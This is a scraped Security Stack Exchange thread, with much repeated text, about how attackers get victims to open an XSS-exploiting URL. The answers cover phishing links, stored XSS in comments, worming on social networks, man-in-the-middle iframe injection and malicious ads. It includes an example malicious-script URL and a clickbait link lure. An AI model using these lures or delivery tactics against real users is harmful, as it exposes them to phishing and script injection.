Mixing
Question About XSS — How does hackers make the users to access such url?
Clash Royale CLAN TAG#URR8PPP
.everyoneloves__top-leaderboard:empty,.everyoneloves__mid-leaderboard:empty margin-bottom:0;
up vote
4
down vote
favorite
I've learned some knowledge about XSS recently, the basic idea is let the user's browser to execute some malicious code created by the hackers.
Say, if a page has a Vulnerability of loading arbitrary script; when user access this url :
http://www.somegoodsite.com/apage?filename=malicious.js
Then the browser will load the "malicious.js" file without any question, and the user will be hacked.
My question is -- How does hackers make the users to access such url?
As the case above and all other technics alike, all have one precondition: the user did some actions that they won't do as usual, if the hacker has to come to say 'hi, there is something funny, take a look!' to everyone, that won't be very effective for attack.
So, is there any magics to make this happened automatically? or any real-life case used to happened?
xss social-engineering
asked 1 hour ago
Hetfield Joe
211
New contributor
Hetfield Joe is a new contributor to this site. Take care in asking for clarification, commenting, and answering.
Check out our Code of Conduct.
add a comment |Â
up vote
4
down vote
favorite
I've learned some knowledge about XSS recently, the basic idea is let the user's browser to execute some malicious code created by the hackers.
Say, if a page has a Vulnerability of loading arbitrary script; when user access this url :
http://www.somegoodsite.com/apage?filename=malicious.js
Then the browser will load the "malicious.js" file without any question, and the user will be hacked.
My question is -- How does hackers make the users to access such url?
As the case above and all other technics alike, all have one precondition: the user did some actions that they won't do as usual, if the hacker has to come to say 'hi, there is something funny, take a look!' to everyone, that won't be very effective for attack.
So, is there any magics to make this happened automatically? or any real-life case used to happened?
xss social-engineering
asked 1 hour ago
Hetfield Joe
211
New contributor
Hetfield Joe is a new contributor to this site. Take care in asking for clarification, commenting, and answering.
Check out our Code of Conduct.
"... the user did some actions that they won't do as usual..." - like, clicking on a link on some web site or in a mail? Or maybe just the usual visit to the same website as before in case of stored XSS. That's all what is needed.
– Steffen Ullrich
1 hour ago
@SteffenUllrich Thanks for comment, "stored XSS" may required some other vulnerability, if there is no way to store this url in the application. what an experienced hacker will do to use this vulnerability? spam email? that not pretty, I think.
– Hetfield Joe
1 hour ago
This is the magic way : <a href="somegoodsite.com/apage?filename=malicious.js">You won't believe what this guy can do with a banana !</a
– Guillaume Beauvois
42 mins ago
add a comment |Â
up vote
4
down vote
favorite
up vote
4
down vote
favorite
I've learned some knowledge about XSS recently, the basic idea is let the user's browser to execute some malicious code created by the hackers.
Say, if a page has a Vulnerability of loading arbitrary script; when user access this url :
http://www.somegoodsite.com/apage?filename=malicious.js
Then the browser will load the "malicious.js" file without any question, and the user will be hacked.
My question is -- How does hackers make the users to access such url?
As the case above and all other technics alike, all have one precondition: the user did some actions that they won't do as usual, if the hacker has to come to say 'hi, there is something funny, take a look!' to everyone, that won't be very effective for attack.
So, is there any magics to make this happened automatically? or any real-life case used to happened?
xss social-engineering
asked 1 hour ago
Hetfield Joe
211
New contributor
Hetfield Joe is a new contributor to this site. Take care in asking for clarification, commenting, and answering.
Check out our Code of Conduct.
I've learned some knowledge about XSS recently, the basic idea is let the user's browser to execute some malicious code created by the hackers.
Say, if a page has a Vulnerability of loading arbitrary script; when user access this url :
http://www.somegoodsite.com/apage?filename=malicious.js
Then the browser will load the "malicious.js" file without any question, and the user will be hacked.
My question is -- How does hackers make the users to access such url?
As the case above and all other technics alike, all have one precondition: the user did some actions that they won't do as usual, if the hacker has to come to say 'hi, there is something funny, take a look!' to everyone, that won't be very effective for attack.
So, is there any magics to make this happened automatically? or any real-life case used to happened?
xss social-engineering
xss social-engineering
asked 1 hour ago
Hetfield Joe
211
New contributor
Hetfield Joe is a new contributor to this site. Take care in asking for clarification, commenting, and answering.
Check out our Code of Conduct.
asked 1 hour ago
Hetfield Joe
211
New contributor
Hetfield Joe is a new contributor to this site. Take care in asking for clarification, commenting, and answering.
Check out our Code of Conduct.
asked 1 hour ago
Hetfield Joe
211
New contributor
Hetfield Joe is a new contributor to this site. Take care in asking for clarification, commenting, and answering.
Check out our Code of Conduct.
asked 1 hour ago
Hetfield Joe
211
asked 1 hour ago
Hetfield Joe
211
211
New contributor
Hetfield Joe is a new contributor to this site. Take care in asking for clarification, commenting, and answering.
Check out our Code of Conduct.
New contributor
Hetfield Joe is a new contributor to this site. Take care in asking for clarification, commenting, and answering.
Check out our Code of Conduct.
Hetfield Joe is a new contributor to this site. Take care in asking for clarification, commenting, and answering.
Check out our Code of Conduct.
"... the user did some actions that they won't do as usual..." - like, clicking on a link on some web site or in a mail? Or maybe just the usual visit to the same website as before in case of stored XSS. That's all what is needed.
– Steffen Ullrich
1 hour ago
@SteffenUllrich Thanks for comment, "stored XSS" may required some other vulnerability, if there is no way to store this url in the application. what an experienced hacker will do to use this vulnerability? spam email? that not pretty, I think.
– Hetfield Joe
1 hour ago
This is the magic way : <a href="somegoodsite.com/apage?filename=malicious.js">You won't believe what this guy can do with a banana !</a
– Guillaume Beauvois
42 mins ago
add a comment |Â
"... the user did some actions that they won't do as usual..." - like, clicking on a link on some web site or in a mail? Or maybe just the usual visit to the same website as before in case of stored XSS. That's all what is needed.
– Steffen Ullrich
1 hour ago
@SteffenUllrich Thanks for comment, "stored XSS" may required some other vulnerability, if there is no way to store this url in the application. what an experienced hacker will do to use this vulnerability? spam email? that not pretty, I think.
– Hetfield Joe
1 hour ago
This is the magic way : <a href="somegoodsite.com/apage?filename=malicious.js">You won't believe what this guy can do with a banana !</a
– Guillaume Beauvois
42 mins ago
"... the user did some actions that they won't do as usual..." - like, clicking on a link on some web site or in a mail? Or maybe just the usual visit to the same website as before in case of stored XSS. That's all what is needed.
– Steffen Ullrich
1 hour ago
"... the user did some actions that they won't do as usual..." - like, clicking on a link on some web site or in a mail? Or maybe just the usual visit to the same website as before in case of stored XSS. That's all what is needed.
– Steffen Ullrich
1 hour ago
@SteffenUllrich Thanks for comment, "stored XSS" may required some other vulnerability, if there is no way to store this url in the application. what an experienced hacker will do to use this vulnerability? spam email? that not pretty, I think.
– Hetfield Joe
1 hour ago
@SteffenUllrich Thanks for comment, "stored XSS" may required some other vulnerability, if there is no way to store this url in the application. what an experienced hacker will do to use this vulnerability? spam email? that not pretty, I think.
– Hetfield Joe
1 hour ago
This is the magic way : <a href="somegoodsite.com/apage?filename=malicious.js">You won't believe what this guy can do with a banana !</a
– Guillaume Beauvois
42 mins ago
This is the magic way : <a href="somegoodsite.com/apage?filename=malicious.js">You won't believe what this guy can do with a banana !</a
– Guillaume Beauvois
42 mins ago
add a comment |Â
3 Answers
3
active
oldest
votes
up vote
1
down vote
There are two main types of XSS, Reflective and persistent. Persistent XSS is when it is stored on the server, affecting other users, while reflective is not stored, but can still affect other users.
One method I've seen is to store something like a redirect is in a comment that has poor sanitising. This way, the code is stored server-side, and when someone requests the page, the code is loaded along with the comments, which then triggers the block of code. This can then redirect the victim to the attackers website, where other malicious things could be occurring, e.g. Fake login pages for credential harvesters, stacks of ads, etc.
If you need more info let me know, I can edit when I'm back at the PC and add more details.
answered 1 hour ago
Connor J
79519
add a comment |Â
up vote
0
down vote
the user did some actions that they won't do as usual
Clicking on a link does seem like a usual action for most users.
See for example this study, in which 56% of users clicked on links in E-Mails from an unknown sender, and ~40% clicked on links send via Facebook (despite 78% being aware of the possible danger). 50% said that they didn't click the link because they didn't know the sender.
That's already an impressive success rate. If the victim knows the attacker, or if the attacker spoofs the identity of someone they know, this rate could be increased even further.
On social networks, reflected XSS might also be wormable. In addition to the malicious action, the injected script could send messages containing the link to all friends of the victim (something like this eg happened to Twitter).
In addition to E-Mail, links could also be distributed in forums, blogs, issue trackers, and so on. This for example happened to Apache.
answered 1 hour ago
tim
21.4k55589
add a comment |Â
up vote
0
down vote
For some attacks the victim needs to visit the attacker's page. There are a couple of ways to do that:
- Phishing. Send the victim an email, Facebook page, LinkedIn invitation with a link pretending to be something else. The success rate of this depends on how much effort goes into the campaign, but success rates above 50% are not uncommon. Especially because the domain name matches: you try to trick users of somegoodsite.com to click on a somegoodsite.com link, and this can generally be trusted.
- Inclusion from within the site itself. Sometimes the site permits to add user content. If the attacker can add an iframe to their profile page, anyone who accesses their profile will be attacked. However, it is pretty uncommon to be able to add an iframe to any site.
- Man-in-the-middle attack. In a man-in-the-middle attack the attacker can modify unencrypted data. Even if somegoodsite.com uses HTTPS, the attacker can inject an iframe in a webpage that doesn't use HTTPS and cause your browser to visit the URL.
- Advertisements. Some sites run intrusive advertisements that load a page in an iframe or even a new window. I sometimes get these with the message that I have won a free iPhone, but you could also run them with an XSS payload. However, I think sites that allow advertisements this intrusive are pretty rare.
answered 52 mins ago
Sjoerd
14.8k73553
add a comment |Â
3 Answers
3
active
oldest
votes
3 Answers
3
active
oldest
votes
active
oldest
votes
active
oldest
votes
up vote
1
down vote
There are two main types of XSS, Reflective and persistent. Persistent XSS is when it is stored on the server, affecting other users, while reflective is not stored, but can still affect other users.
One method I've seen is to store something like a redirect is in a comment that has poor sanitising. This way, the code is stored server-side, and when someone requests the page, the code is loaded along with the comments, which then triggers the block of code. This can then redirect the victim to the attackers website, where other malicious things could be occurring, e.g. Fake login pages for credential harvesters, stacks of ads, etc.
If you need more info let me know, I can edit when I'm back at the PC and add more details.
answered 1 hour ago
Connor J
79519
add a comment |Â
up vote
1
down vote
There are two main types of XSS, Reflective and persistent. Persistent XSS is when it is stored on the server, affecting other users, while reflective is not stored, but can still affect other users.
One method I've seen is to store something like a redirect is in a comment that has poor sanitising. This way, the code is stored server-side, and when someone requests the page, the code is loaded along with the comments, which then triggers the block of code. This can then redirect the victim to the attackers website, where other malicious things could be occurring, e.g. Fake login pages for credential harvesters, stacks of ads, etc.
If you need more info let me know, I can edit when I'm back at the PC and add more details.
answered 1 hour ago
Connor J
79519
add a comment |Â
up vote
1
down vote
up vote
1
down vote
There are two main types of XSS, Reflective and persistent. Persistent XSS is when it is stored on the server, affecting other users, while reflective is not stored, but can still affect other users.
One method I've seen is to store something like a redirect is in a comment that has poor sanitising. This way, the code is stored server-side, and when someone requests the page, the code is loaded along with the comments, which then triggers the block of code. This can then redirect the victim to the attackers website, where other malicious things could be occurring, e.g. Fake login pages for credential harvesters, stacks of ads, etc.
If you need more info let me know, I can edit when I'm back at the PC and add more details.
answered 1 hour ago
Connor J
79519
There are two main types of XSS, Reflective and persistent. Persistent XSS is when it is stored on the server, affecting other users, while reflective is not stored, but can still affect other users.
One method I've seen is to store something like a redirect is in a comment that has poor sanitising. This way, the code is stored server-side, and when someone requests the page, the code is loaded along with the comments, which then triggers the block of code. This can then redirect the victim to the attackers website, where other malicious things could be occurring, e.g. Fake login pages for credential harvesters, stacks of ads, etc.
If you need more info let me know, I can edit when I'm back at the PC and add more details.
answered 1 hour ago
Connor J
79519
answered 1 hour ago
Connor J
79519
answered 1 hour ago
Connor J
79519
answered 1 hour ago
Connor J
79519
79519
add a comment |Â
add a comment |Â
up vote
0
down vote
the user did some actions that they won't do as usual
Clicking on a link does seem like a usual action for most users.
See for example this study, in which 56% of users clicked on links in E-Mails from an unknown sender, and ~40% clicked on links send via Facebook (despite 78% being aware of the possible danger). 50% said that they didn't click the link because they didn't know the sender.
That's already an impressive success rate. If the victim knows the attacker, or if the attacker spoofs the identity of someone they know, this rate could be increased even further.
On social networks, reflected XSS might also be wormable. In addition to the malicious action, the injected script could send messages containing the link to all friends of the victim (something like this eg happened to Twitter).
In addition to E-Mail, links could also be distributed in forums, blogs, issue trackers, and so on. This for example happened to Apache.
answered 1 hour ago
tim
21.4k55589
add a comment |Â
up vote
0
down vote
the user did some actions that they won't do as usual
Clicking on a link does seem like a usual action for most users.
See for example this study, in which 56% of users clicked on links in E-Mails from an unknown sender, and ~40% clicked on links send via Facebook (despite 78% being aware of the possible danger). 50% said that they didn't click the link because they didn't know the sender.
That's already an impressive success rate. If the victim knows the attacker, or if the attacker spoofs the identity of someone they know, this rate could be increased even further.
On social networks, reflected XSS might also be wormable. In addition to the malicious action, the injected script could send messages containing the link to all friends of the victim (something like this eg happened to Twitter).
In addition to E-Mail, links could also be distributed in forums, blogs, issue trackers, and so on. This for example happened to Apache.
answered 1 hour ago
tim
21.4k55589
add a comment |Â
up vote
0
down vote
up vote
0
down vote
the user did some actions that they won't do as usual
Clicking on a link does seem like a usual action for most users.
See for example this study, in which 56% of users clicked on links in E-Mails from an unknown sender, and ~40% clicked on links send via Facebook (despite 78% being aware of the possible danger). 50% said that they didn't click the link because they didn't know the sender.
That's already an impressive success rate. If the victim knows the attacker, or if the attacker spoofs the identity of someone they know, this rate could be increased even further.
On social networks, reflected XSS might also be wormable. In addition to the malicious action, the injected script could send messages containing the link to all friends of the victim (something like this eg happened to Twitter).
In addition to E-Mail, links could also be distributed in forums, blogs, issue trackers, and so on. This for example happened to Apache.
answered 1 hour ago
tim
21.4k55589
the user did some actions that they won't do as usual
Clicking on a link does seem like a usual action for most users.
See for example this study, in which 56% of users clicked on links in E-Mails from an unknown sender, and ~40% clicked on links send via Facebook (despite 78% being aware of the possible danger). 50% said that they didn't click the link because they didn't know the sender.
That's already an impressive success rate. If the victim knows the attacker, or if the attacker spoofs the identity of someone they know, this rate could be increased even further.
On social networks, reflected XSS might also be wormable. In addition to the malicious action, the injected script could send messages containing the link to all friends of the victim (something like this eg happened to Twitter).
In addition to E-Mail, links could also be distributed in forums, blogs, issue trackers, and so on. This for example happened to Apache.
answered 1 hour ago
tim
21.4k55589
edited 54 mins ago
answered 1 hour ago
tim
21.4k55589
answered 1 hour ago
tim
21.4k55589
answered 1 hour ago
tim
21.4k55589
21.4k55589
add a comment |Â
add a comment |Â
up vote
0
down vote
For some attacks the victim needs to visit the attacker's page. There are a couple of ways to do that:
- Phishing. Send the victim an email, Facebook page, LinkedIn invitation with a link pretending to be something else. The success rate of this depends on how much effort goes into the campaign, but success rates above 50% are not uncommon. Especially because the domain name matches: you try to trick users of somegoodsite.com to click on a somegoodsite.com link, and this can generally be trusted.
- Inclusion from within the site itself. Sometimes the site permits to add user content. If the attacker can add an iframe to their profile page, anyone who accesses their profile will be attacked. However, it is pretty uncommon to be able to add an iframe to any site.
- Man-in-the-middle attack. In a man-in-the-middle attack the attacker can modify unencrypted data. Even if somegoodsite.com uses HTTPS, the attacker can inject an iframe in a webpage that doesn't use HTTPS and cause your browser to visit the URL.
- Advertisements. Some sites run intrusive advertisements that load a page in an iframe or even a new window. I sometimes get these with the message that I have won a free iPhone, but you could also run them with an XSS payload. However, I think sites that allow advertisements this intrusive are pretty rare.
answered 52 mins ago
Sjoerd
14.8k73553
add a comment |Â
up vote
0
down vote
For some attacks the victim needs to visit the attacker's page. There are a couple of ways to do that:
- Phishing. Send the victim an email, Facebook page, LinkedIn invitation with a link pretending to be something else. The success rate of this depends on how much effort goes into the campaign, but success rates above 50% are not uncommon. Especially because the domain name matches: you try to trick users of somegoodsite.com to click on a somegoodsite.com link, and this can generally be trusted.
- Inclusion from within the site itself. Sometimes the site permits to add user content. If the attacker can add an iframe to their profile page, anyone who accesses their profile will be attacked. However, it is pretty uncommon to be able to add an iframe to any site.
- Man-in-the-middle attack. In a man-in-the-middle attack the attacker can modify unencrypted data. Even if somegoodsite.com uses HTTPS, the attacker can inject an iframe in a webpage that doesn't use HTTPS and cause your browser to visit the URL.
- Advertisements. Some sites run intrusive advertisements that load a page in an iframe or even a new window. I sometimes get these with the message that I have won a free iPhone, but you could also run them with an XSS payload. However, I think sites that allow advertisements this intrusive are pretty rare.
answered 52 mins ago
Sjoerd
14.8k73553
add a comment |Â
up vote
0
down vote
up vote
0
down vote
For some attacks the victim needs to visit the attacker's page. There are a couple of ways to do that:
- Phishing. Send the victim an email, Facebook page, LinkedIn invitation with a link pretending to be something else. The success rate of this depends on how much effort goes into the campaign, but success rates above 50% are not uncommon. Especially because the domain name matches: you try to trick users of somegoodsite.com to click on a somegoodsite.com link, and this can generally be trusted.
- Inclusion from within the site itself. Sometimes the site permits to add user content. If the attacker can add an iframe to their profile page, anyone who accesses their profile will be attacked. However, it is pretty uncommon to be able to add an iframe to any site.
- Man-in-the-middle attack. In a man-in-the-middle attack the attacker can modify unencrypted data. Even if somegoodsite.com uses HTTPS, the attacker can inject an iframe in a webpage that doesn't use HTTPS and cause your browser to visit the URL.
- Advertisements. Some sites run intrusive advertisements that load a page in an iframe or even a new window. I sometimes get these with the message that I have won a free iPhone, but you could also run them with an XSS payload. However, I think sites that allow advertisements this intrusive are pretty rare.
answered 52 mins ago
Sjoerd
14.8k73553
For some attacks the victim needs to visit the attacker's page. There are a couple of ways to do that:
- Phishing. Send the victim an email, Facebook page, LinkedIn invitation with a link pretending to be something else. The success rate of this depends on how much effort goes into the campaign, but success rates above 50% are not uncommon. Especially because the domain name matches: you try to trick users of somegoodsite.com to click on a somegoodsite.com link, and this can generally be trusted.
- Inclusion from within the site itself. Sometimes the site permits to add user content. If the attacker can add an iframe to their profile page, anyone who accesses their profile will be attacked. However, it is pretty uncommon to be able to add an iframe to any site.
- Man-in-the-middle attack. In a man-in-the-middle attack the attacker can modify unencrypted data. Even if somegoodsite.com uses HTTPS, the attacker can inject an iframe in a webpage that doesn't use HTTPS and cause your browser to visit the URL.
- Advertisements. Some sites run intrusive advertisements that load a page in an iframe or even a new window. I sometimes get these with the message that I have won a free iPhone, but you could also run them with an XSS payload. However, I think sites that allow advertisements this intrusive are pretty rare.
answered 52 mins ago
Sjoerd
14.8k73553
answered 52 mins ago
Sjoerd
14.8k73553
answered 52 mins ago
Sjoerd
14.8k73553
answered 52 mins ago
Sjoerd
14.8k73553
14.8k73553
add a comment |Â
add a comment |Â
Hetfield Joe is a new contributor. Be nice, and check out our Code of Conduct.
Hetfield Joe is a new contributor. Be nice, and check out our Code of Conduct.
Hetfield Joe is a new contributor. Be nice, and check out our Code of Conduct.
Hetfield Joe is a new contributor. Be nice, and check out our Code of Conduct.
Sign up or log in
StackExchange.ready(function ()
StackExchange.helpers.onClickDraftSave('#login-link');
);
Sign up using Google
Sign up using Facebook
Sign up using Email and Password
Post as a guest
StackExchange.ready(
function ()
StackExchange.openid.initPostLogin('.new-post-login', 'https%3a%2f%2fsecurity.stackexchange.com%2fquestions%2f194037%2fquestion-about-xss-how-does-hackers-make-the-users-to-access-such-url%23new-answer', 'question_page');
);
Post as a guest
Sign up or log in
StackExchange.ready(function ()
StackExchange.helpers.onClickDraftSave('#login-link');
);
Sign up using Google
Sign up using Facebook
Sign up using Email and Password
Post as a guest
Sign up or log in
StackExchange.ready(function ()
StackExchange.helpers.onClickDraftSave('#login-link');
);
Sign up using Google
Sign up using Facebook
Sign up using Email and Password
Post as a guest
Sign up or log in
StackExchange.ready(function ()
StackExchange.helpers.onClickDraftSave('#login-link');
);
Sign up using Google
Sign up using Facebook
Sign up using Email and Password
Sign up using Google
Sign up using Facebook
Sign up using Email and Password
"... the user did some actions that they won't do as usual..." - like, clicking on a link on some web site or in a mail? Or maybe just the usual visit to the same website as before in case of stored XSS. That's all what is needed.
– Steffen Ullrich
1 hour ago
@SteffenUllrich Thanks for comment, "stored XSS" may required some other vulnerability, if there is no way to store this url in the application. what an experienced hacker will do to use this vulnerability? spam email? that not pretty, I think.
– Hetfield Joe
1 hour ago
This is the magic way : <a href="somegoodsite.com/apage?filename=malicious.js">You won't believe what this guy can do with a banana !</a
– Guillaume Beauvois
42 mins ago